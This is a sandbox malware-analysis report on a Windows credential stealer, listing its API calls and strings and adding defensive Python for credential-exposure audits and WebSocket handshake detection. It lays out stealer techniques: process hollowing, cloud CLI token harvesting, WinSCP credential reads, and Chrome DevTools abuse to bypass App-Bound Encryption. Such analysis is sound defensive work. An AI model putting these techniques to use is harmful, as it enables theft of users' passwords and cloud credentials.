                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                        • Opcode ID: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                        • Instruction ID: 12d9cbd333469b35ebce06d581e83ce10451d2d381d02456cf870b2c2c34d416
                                                                                                                                                                        • Opcode Fuzzy Hash: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                        • Instruction Fuzzy Hash: AA318BBA705104EFD708CB5CDE89E69B7F9EB893087045025E812D7360E6F5EE14CB55
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                        • Opcode ID: 82f1f6946d401927b31d1bc87c898351d45fb518fe8c5a701b9c54506745076b
                                                                                                                                                                        • Instruction ID: 76e6a26e387ad86429eda5c4ea260e08db291650480943bcd22c9eb06e69ad47
                                                                                                                                                                        • Opcode Fuzzy Hash: 82f1f6946d401927b31d1bc87c898351d45fb518fe8c5a701b9c54506745076b
                                                                                                                                                                        • Instruction Fuzzy Hash: FEF05E76A00515AFD214DF15EC81E9A37ACEB8A66CB8A0120FD48AB311E2256D158BB6
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptUnprotectData.CRYPT32 ref: 0041D222
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
Yara matches
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
APIs
• GetUserNameA.ADVAPI32(00000000), ref: 00431475
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00439CC1
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: DriveLogicalStrings
• String ID:
• API String ID: 2022863570-0
APIs
• InternetReadFile.WININET(?,?,000007CF,?), ref: 0041803A
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
APIs
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00431714
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0

Control-flow Graph
control_flow_graph 0 4377b7-438a25 call 431c61 228 438a27-438edb lstrlenA 0->228
APIs
• lstrlenA.KERNEL32(00000000), ref: 00438E10
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: lstrlen
• String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
• API String ID: 1659193697-1014693891

Control-flow Graph
control_flow_graph 286 44163a-44224d LoadLibraryA * 6
APIs
• LoadLibraryA.KERNEL32(0066B8DB), ref: 004420E9
• LoadLibraryA.KERNEL32(0066B8F3), ref: 0044212F
• LoadLibraryA.KERNEL32(0066B8FF), ref: 00442152
• LoadLibraryA.KERNEL32(0066B926), ref: 004421BB
• LoadLibraryA.KERNEL32(0066B931), ref: 004421DE
• LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00442224
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 1029625771-2674769033

Control-flow Graph
APIs
• lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 004167AF
• lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 004167CE
• RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58), ref: 004167F1
• memcpy.MSVCRT(00000000,?,00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58), ref: 0041682B
• lstrlenA.KERNEL32(00000000,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 0041684E
• memcpy.MSVCRT(00000000,?,?,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 00416859
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 0041687C
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 004168AB
• memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,file_data,?,build_id,?,",?,0066CA58), ref: 004168B2
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Similarity
• API ID: lstrlen$memcpy$AllocateHeap
• String ID: "$------$build_id$file_data
• API String ID: 2686163794-481700987
• Opcode ID: dd825d201735d93efb7ef9095eeddf40bcf2c6963a0708d52d7b0c9172e33aa5
• Instruction ID: 4151677d09384e44cf8f26b5bc9ab36b3bcb42e4d8bcf8d9f074c6dc33b07d58
• Opcode Fuzzy Hash: dd825d201735d93efb7ef9095eeddf40bcf2c6963a0708d52d7b0c9172e33aa5
• Instruction Fuzzy Hash: 262216713015185FC606EB9DDC91A6EB3EBBFD87093084039E916C3366CA64DE198A9E

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Similarity
• API ID: memset
• String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
• API String ID: 2221118986-3645552435
• Opcode ID: 4f362a5bf8fecd7bf318df3dfef4ebbe921289761eb1be4bf1afdda7e548a895
• Instruction ID: bc471db5ab473fb34068e527421e82f64e62dfe863696c80f29b4267a5bc31fb
• Opcode Fuzzy Hash: 4f362a5bf8fecd7bf318df3dfef4ebbe921289761eb1be4bf1afdda7e548a895
• Instruction Fuzzy Hash: 3DB159B6B002149FC719DF68DD91D9933EABB8C314B090369E805D7322EEB4E958CF59
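The string set of this function (*.*, \.aws\, \.azure\, \.IdentityService\, msal.cache, and the Azure\... names) is the directory walk a stealer performs over the user's cloud CLI credential stores: AWS CLI access keys and SSO cache under .aws, Azure CLI tokens and subscription profile under .azure, and the MSAL identity-service token cache. The Azure\ prefixed variants are most plausibly the folder names the copies are staged under before upload; the report does not confirm that, and the "*.*" wildcard means whole directories are taken, not just the token files. The Python audit below is an added example for this report, not code from the sample or from Joe Sandbox: given a profile root it lists what such a walk would collect, so an incident responder knows which keys and tokens to rotate. The AppData\Local location of .IdentityService is an assumption from general Windows knowledge, not something the report states.

```python
"""Audit a user profile for the cloud credential stores that the function
above enumerates.  Added example for this report; not code from the sample
or from Joe Sandbox."""
import os
from pathlib import Path

# Directory suffixes taken from the function's string set (\.aws\, \.azure\,
# \.IdentityService\).  The AppData\Local variant is where Windows keeps the
# MSAL identity-service cache; that location is an assumption from general
# knowledge, not something the report states.
TARGET_DIRS = (
    Path(".aws"),
    Path(".azure"),
    Path(".IdentityService"),
    Path("AppData") / "Local" / ".IdentityService",
)
# Named file from the same string set.
TARGET_FILE_NAMES = ("msal.cache",)

FAMILY = {
    ".aws": "AWS CLI/SDK access keys and SSO cache",
    ".azure": "Azure CLI tokens and subscription profile",
    ".IdentityService": "MSAL identity-broker token cache",
}


def find_cloud_credential_files(profile_root):
    """Return (relative_posix_path, size) for every file under PROFILE_ROOT that
    the stealer's '*.*' walk of the target directories would pick up, plus any
    msal.cache found elsewhere in the profile.  Sorted for stable output."""
    root = Path(profile_root)
    seen = set()
    for rel in TARGET_DIRS:
        base = root / rel
        if base.is_dir():
            for p in base.rglob("*"):
                if p.is_file():
                    seen.add(p)
    for name in TARGET_FILE_NAMES:
        for p in root.rglob(name):
            if p.is_file():
                seen.add(p)
    return sorted((p.relative_to(root).as_posix(), p.stat().st_size) for p in seen)


def exposure_summary(hits):
    """Group hits by credential family so a responder knows what to rotate."""
    groups = {}
    for rel, _size in hits:
        parts = rel.split("/")
        family = next((FAMILY[d] for d in parts if d in FAMILY), "MSAL token cache")
        groups.setdefault(family, []).append(rel)
    return groups


if __name__ == "__main__":
    home = os.environ.get("USERPROFILE") or os.path.expanduser("~")
    hits = find_cloud_credential_files(home)
    for family, paths in exposure_summary(hits).items():
        print(family)
        for rel in paths:
            print("   ", rel)
```

Run it once per affected user, passing that user's profile root (%USERPROFILE% on Windows). Everything it lists should be treated as exposed: the walk copies whole directories, so config files that name accounts, subscriptions and role ARNs leave with the tokens and give the operator a map of what to try them against.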

Control-flow Graph
• 0041E1DB-0041E345 (RtlAllocateHeap, lstrcatA x4, HeapFree, RtlFreeHeap, DeleteFileA) -> 0041E349-0041E34F -> 0041E354, a block that loops on itself
APIs
• RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0041E204
• lstrcatA.KERNEL32(00000000,00000000), ref: 0041E224
• lstrcatA.KERNEL32(?,0067CC4C), ref: 0041E254
• lstrcatA.KERNEL32(?,00000000), ref: 0041E26F
• lstrcatA.KERNEL32(?,_passwords.db), ref: 0041E29F
• HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E301
• RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0041E320
• DeleteFileA.KERNEL32(00000000), ref: 0041E33C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: the same 18 memory regions listed for the previous function (0000000F.00000002.2754107533.0000000000400000 through 0000000F.00000002.2754716096.0000000000680000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Similarity
• API ID: lstrcat$Heap$Free$AllocateDeleteFile
• String ID: _passwords.db
• API String ID: 3049345645-1485422284
• Opcode ID: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
• Instruction ID: 24bc4b787eba163100fbfc58756f5204999f887e60b27380e355edf6f9f48f95
• Opcode Fuzzy Hash: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
• Instruction Fuzzy Hash: 91410579601204AFC704DF68EDD596AB7B8FF986007080065ED05E7371EAB4FE12DB6A

Control-flow Graph
• single block 0041B1AE-0041B3CC (send)
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 0041B3B0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: the same 18 memory regions listed for the previous function (0000000F.00000002.2754107533.0000000000400000 through 0000000F.00000002.2754716096.0000000000680000)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Similarity
• API ID: send
• String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $>XTo$GET $\WTo$lXTo
• API String ID: 2809346765-1623567536
• Opcode ID: 65df4931d48b84086f5179b24d8c035c8a09bfab35bb16bc1cde2d2915c1e98c
• Instruction ID: b7b9db9ffdf1dca5a55e289326cc11070d4408588f9295d6d31fd7d94abdbf18
• Opcode Fuzzy Hash: 65df4931d48b84086f5179b24d8c035c8a09bfab35bb16bc1cde2d2915c1e98c
• Instruction Fuzzy Hash: DB5120722041109FC328DB5CED91F9B77E9AFD5214F084928F51AD3361EAF4AE14CB5A
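The strings attached to this single send() call ("GET ", " HTTP/1.1", "Host: ", "Connection: Upgrade", "Upgrade: websocket", "Sec-WebSocket-Key: ", "Sec-WebSocket-Version: 13") are the client half of an RFC 6455 opening handshake assembled by hand and written to a raw Winsock socket; the sample carries no WebSocket library. Together with the browser launch carrying --remote-debugging-port=9223 in the next function, this is consistent with talking to Chrome's DevTools WebSocket endpoint, which is how the "Attempt to bypass Chrome Application-Bound Encryption" signature at the top of this report is usually realised: the browser process decrypts cookies and passwords on behalf of a DevTools client, so the stealer never has to defeat App-Bound Encryption itself. The fragments >XTo, \WTo and lXTo are not text; they are bytes the string scanner picked up next to the real literals. The Python below is an added example, not code from the sample or from Joe Sandbox: it builds the request in the shape those strings imply, implements the server-side validation and Sec-WebSocket-Accept computation from RFC 6455, and adds a heuristic a proxy or host sensor could use to flag upgrade handshakes aimed at a loopback DevTools port. The request path and the loopback port set are assumptions; the report shows neither.

```python
"""RFC 6455 opening handshake: client request in the shape the function
above emits, plus the server-side validation.  Added example for this report,
not code from the sample or from Joe Sandbox."""
import base64
import binascii
import hashlib
import os

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed by RFC 6455 section 1.3
# 9222 is what most tooling documents; 9223 is what this sample passes to the
# browser (see the function below).  Assumed set, extend per environment.
DEVTOOLS_PORTS = {9222, 9223}


def build_client_handshake(host, path, key=None):
    """Compose the request as the sample's literals suggest: request line,
    Host, Connection/Upgrade, Sec-WebSocket-Key, Sec-WebSocket-Version: 13."""
    if key is None:
        key = base64.b64encode(os.urandom(16)).decode()  # RFC: 16 random bytes
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Connection: Upgrade",
        "Upgrade: websocket",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def accept_value(key):
    """Sec-WebSocket-Accept = base64(SHA-1(key + GUID)), RFC 6455 section 4.2.2."""
    return base64.b64encode(hashlib.sha1((key + WS_GUID).encode()).digest()).decode()


def parse_handshake(raw):
    """Validate a client handshake.  Returns {path, host, key} or None when the
    request is not a well-formed WebSocket upgrade (header names are
    case-insensitive; Connection may be a token list)."""
    head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[0] != "GET" or parts[2] != "HTTP/1.1":
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")  # first colon only: keeps host:port intact
        if not sep:
            return None
        headers[name.strip().lower()] = value.strip()
    tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "upgrade" not in tokens or headers.get("upgrade", "").lower() != "websocket":
        return None
    if headers.get("sec-websocket-version") != "13":
        return None
    key = headers.get("sec-websocket-key", "")
    try:
        if len(base64.b64decode(key, validate=True)) != 16:
            return None
    except (binascii.Error, ValueError):
        return None
    return {"path": parts[1], "host": headers.get("host", ""), "key": key}


def server_response(raw):
    """Answer as an RFC 6455 server: 101 with the computed accept value, or 400."""
    req = parse_handshake(raw)
    if req is None:
        return b"HTTP/1.1 400 Bad Request\r\n\r\n"
    return (
        "HTTP/1.1 101 Switching Protocols\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Accept: {accept_value(req['key'])}\r\n\r\n"
    ).encode()


def looks_like_devtools_target(req):
    """Sensor heuristic: a WebSocket upgrade whose Host is loopback on one of
    the DevTools ports.  Keyed on the handshake, not on the port alone."""
    host, _, port = req["host"].partition(":")
    return host in ("127.0.0.1", "localhost", "[::1]") and port.isdigit() and int(port) in DEVTOOLS_PORTS


if __name__ == "__main__":
    req = build_client_handshake("127.0.0.1:9223", "/")
    print(req.decode(), end="")
    print(server_response(req).decode(), end="")
    print("devtools target:", looks_like_devtools_target(parse_handshake(req)))
```

The handshake itself is legitimate protocol traffic; what makes it worth alerting on is the combination visible in this report: a non-browser process opening a WebSocket to the loopback DevTools port shortly after it launched the browser with --remote-debugging-port. A sensor that can only see the handshake should pair it with the process-creation event from the next function.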

Control-flow Graph
• 0041F999-0041FA7A (memset, lstrcatA x3) -> call at 0041FA80 whose target varied across executions (004348F4, 0041CB56, 0041CD09, 004349BE, 0043489C) -> 0041FA82-0041FAA3
APIs
• memset.MSVCRT ref: 0041F9A9
• lstrcatA.KERNEL32(?,00000000), ref: 0041F9D2
• lstrcatA.KERNEL32(?,00000000), ref: 0041F9F0
• lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 0041FA23
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$memset
                                                                                                                                                                        • String ID: --remote-debugging-port=9223 --profile-directory="$ 0
                                                                                                                                                                        • API String ID: 2788080104-1375269121
                                                                                                                                                                        • Opcode ID: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                        • Instruction ID: 114670f2cd88bf99f37d533532433d574fa85a0011b7eefcf1e9e4fcfdc3aaaf
                                                                                                                                                                        • Opcode Fuzzy Hash: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                        • Instruction Fuzzy Hash: 62317CB5A002049FDB14DF68DC91B9977F9EF89704F0845AAED06D7320E7B0AE44CB86

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 543 4260e5-4261a9 memset * 4 RegOpenKeyExA
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00426101
                                                                                                                                                                        • memset.MSVCRT ref: 0042611A
                                                                                                                                                                        • memset.MSVCRT ref: 0042612B
                                                                                                                                                                        • memset.MSVCRT ref: 0042613C
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 00426184
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
